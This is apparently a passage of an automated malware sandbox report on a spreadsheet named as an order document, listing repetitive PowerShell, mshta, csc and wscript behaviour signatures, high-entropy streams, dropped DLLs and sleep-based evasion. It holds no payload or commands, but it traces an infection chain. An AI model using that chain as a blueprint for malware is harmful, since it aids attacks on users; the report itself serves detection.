          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: A & C Metrology OC 545714677889Materiale.xlsStream path 'MBD014C1E4D/Package' entropy: 7.94807170977 (max. 8.0)
          Source: A & C Metrology OC 545714677889Materiale.xlsStream path 'Workbook' entropy: 7.99929899945 (max. 8.0)
          Source: 7B130000.0.drStream path 'Workbook' entropy: 7.99922606033 (max. 8.0)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,31_2_0040DD85
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1996Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5118Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2831Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3784Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 621Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1614Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1707Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8140Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 884
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1181
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1470
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1719
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 697
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1612
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8157
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9700
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\revod450\revod450.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dllJump to dropped file
          Source: C:\Windows\System32\mshta.exe TID: 3740Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep count: 2831 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep count: 3784 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 621 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 1614 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep count: 1707 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep count: 8140 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -14757395258967632s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\System32\mshta.exe TID: 2432Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep count: 884 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep count: 1181 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep count: 1470 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3516Thread sleep count: 1719 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1652Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 697 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep count: 333 > 30
